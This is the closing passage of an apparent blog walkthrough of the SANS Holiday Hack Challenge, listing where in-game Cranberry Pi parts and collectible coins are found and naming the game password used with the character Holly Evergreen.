Cranberry Pi Board - Elf House #1 -> Secret Fireplace Room

Power Cord - The North Pole

SD Card - The North Pole

HDMI Cable - Workshop

Once you have all of the parts, head back to Holly Evergreen at the start of the game and tell her the password extracted in Question 5 ("yummycookies").

Coin Locations - Present Day

Coin 01 - The North Pole (behind roof)

Coin 02 - Elf House #2 (in Kitchen)

Coin 03 - Elf House #2 (under couch)

Coin 04 - Elf House #2 - Upstairs (in trough)

Coin 05 - Elf House #2 - Room 2

Coin 06 - Elf House #1 -> Secret Fireplace Room

Coin 07 - NetWars Experience Treehouse (left side)

Coin 08 - The North Pole (on top of NetWars roof)

Coin 09 - Small Tree House

Coin 10 - The North Pole (front of Santa's Workshop)

Coin 11 - Workshop (conveyor belt)

Coin 12 - DFER

Coin 13 - The Corridor

Coin Locations - 1978

Coin 14 - The North Pole (beyond Holly Evergreen)

Coin 15 - The North Pole (behind two houses on left)

Coin 16 - The Big Tree (upstairs)

Coin 17 - NetWars Experience Treehouse (right side)

Coin 18 - Santa's Office (in knights hand)

Coin 19 - Workshop (behind boxes)

Coin 20 - Workshop - Train Station

With that, we wrap up the last of the in-game achievements and fully complete this years challenge!

Props again to the SANs team for another great Holiday Hack Challenge!

Until next year...

Older posts...